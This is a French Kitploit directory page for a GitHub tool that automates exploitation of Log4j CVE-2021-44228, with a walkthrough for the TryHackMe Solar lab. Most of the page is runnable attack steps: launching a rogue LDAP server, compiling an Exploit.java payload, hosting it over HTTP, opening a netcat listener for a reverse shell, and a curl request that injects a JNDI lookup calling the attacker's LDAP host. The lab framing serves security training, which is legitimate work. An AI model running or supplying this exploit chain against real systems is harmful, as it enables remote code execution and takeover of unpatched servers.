Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j — Exploitation automatisée de Log4j CVE-2021-44228 avec serveur LDAP et compilation de payload, incluant un guide pas à pas pour le challenge Solar de TryHackMe. | Kitploit
Outils/GitHubGitHub/h3x0v3rl0rd/log4j
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubh3x0v3rl0rd/log4j

log4j

Exploitation automatisée de Log4j CVE-2021-44228 avec serveur LDAP et compilation de payload, incluant un guide pas à pas pour le challenge Solar de TryHackMe.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

💻 -h3x0v3rl0rd-

Exploitation de log4j CVE-2021-44228 ( TryHackMe Solar, Procédure pas à pas)

root@kitploit:~
git clone https://github.com/n3rdh4x0r/log4j.git 

1. Exécutez log4j.py (Cela installera toutes les applications nécessaires et démarrera le serveur LDAP)

root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251

image

2. Ajoutez l'IP de l'attaquant au fichier Exploit.java

2021-12-19_00-52

3. Compilez le payload

root@kitploit:~
javac Exploit.java -source 8 -target 8

image

4. Serveur HTTP temporaire

root@kitploit:~
python3 -m http.server 8888

image

5. Écouteur netcat

root@kitploit:~
nc -lnvp 9999

image

6. Enfin, il ne reste plus qu'à déclencher l'exploit et à envoyer notre syntaxe JNDI ! Notez les changements de numéro de port (qui font désormais référence à notre serveur LDAP) et la ressource que nous récupérons, en spécifiant notre exploit :

root@kitploit:~
curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

image

image

Télécharger l’outil